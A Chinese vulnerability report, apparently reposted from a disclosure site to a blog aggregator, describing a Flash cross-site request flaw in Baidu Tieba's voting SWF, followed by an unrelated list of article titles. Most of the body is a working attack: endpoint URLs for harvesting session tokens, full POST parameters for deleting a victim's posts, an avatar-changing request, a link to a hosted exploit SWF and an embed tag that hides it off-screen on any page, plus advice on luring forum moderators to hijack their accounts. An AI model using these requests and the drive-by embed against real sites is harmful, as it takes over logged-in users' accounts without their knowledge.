百度贴吧XSS漏洞可控制已登录的贴吧账号(删帖、修改资料等)
来源:互联网 发布:网络音频编码器 编辑:程序博客网 时间:2024/04/30 07:20
flash 反射提权。原理 http://drops.wooyun.org/papers/5732,这次演示的是第3个Demo的方式。
详细说明:
### 原理
问题 SWF:http://tieba.baidu.com/tb/static-itieba3/swf/itiebaVote.swf
其中 baidu.vote.DataManager.requestPageData() 可以发请求。
请求地址没写死,从 baidu.vote.enumerate.Constants.URL_VOTE_DETAIL 读取。(这个程序猿也够弱的,居然是用 var 定义的。如果是 const 那还改不了)
每次请求前修改这个伪常量,就可发起跨站请求。
同时,数据返回时调用了 PostVoteResult.fromString(),其中使用 JSON 解码。之前文中介绍过,即使不是 JSON 格式的数据,也可以通过全局异常捕获,接住解码时的错误,从中获取页面信息。
### 利用
http://tieba.baidu.com/ 可获取登录的账号名。
http://tieba.baidu.com/home/profile?un={nick} 可获取 bdstoken、portrait
删帖:
POST http://tieba.baidu.com/f/commit/post/delete
tbs={页面中可获取}
kw={吧名}
tid={帖子 id}
user_name={nick}
pid={页面中可获取}
delete_my_post=1
delete_my_thread=0
is_vipdel=1
is_finf=false
修改头像
http://himg.baidu.com/sys/corpupload?callback=A&coordX=0&coordY=0&coordW=200&coordH=200&psign={portrait}&picId=21751076141&bdstoken={bdstoken}
...
贴吧大部分接口都没验证 referer,所有都能成功。
由于发帖需要验证码,搞成蠕虫有点麻烦。但控制了吧主账号的话,还是可以通过 HTTP 隧道的方式,人工发帖。(给吧主发个超链接,里面放些有趣的东西,让他多停留一会)
漏洞证明:
这里给个自动修改百度用户头像的 Demo:
http://www.etherdream.com/hack/tieba-joke/exp.swf
直接访问,或嵌套在任意页面:
<embed src="//t.cn/RAY0j61" allowScriptAccess="always" style="position:absolute; top:-999px;">
即可修改已登录的百度账号头像。
- 百度贴吧XSS漏洞可控制已登录的贴吧账号(删帖、修改资料等)
- 出售百度贴吧账号的高回头率暴利项目
- 第三方登录(百度账号登录)
- 修改苹果开发者账号的资料
- 百度账号登录测试
- Java实现账号密码登录窗口(包含修改密码等)
- xss漏洞的常识(摘抄)
- XSS漏洞的分类
- XSS漏洞的分类
- 百度贴吧自动抓取账号,自动群发私信
- 百度贴吧账号注册软件 破解版
- SVN修改登录账号
- 腾讯某站XSS漏洞可获取cookie/skey(点击一下上你的各种qq业务)
- Android开发之仿IOS版百度贴吧切换账号时的弹出视图
- Pod2g已发现可完美越狱iOS 5的漏洞
- 利用xss漏洞窃取cookie登录
- [Qt] 百度post账号登录
- 一个可大规模悄无声息窃取淘宝/支付宝账号与密码的漏洞 -(埋雷式攻击附带视频演示)
- UML设计中的箭头详解
- public 修饰符
- leetcode_Find Peak Element
- 汇编中各寄存器的作用
- mcupdate详解
- 百度贴吧XSS漏洞可控制已登录的贴吧账号(删帖、修改资料等)
- 为Eclipse或MyEclipse安装PHP插件
- 代码编辑器使用范例
- 【多线程_提高篇】 thread.stop禁用的原因
- MySQL 获得当前日期时间(以及时间的转换)
- Python学习-格式化数据并排序
- 这些大佬们如何看待创业
- self与super的区别
- 第十周 【项目1 - 存储班长信息的学生类】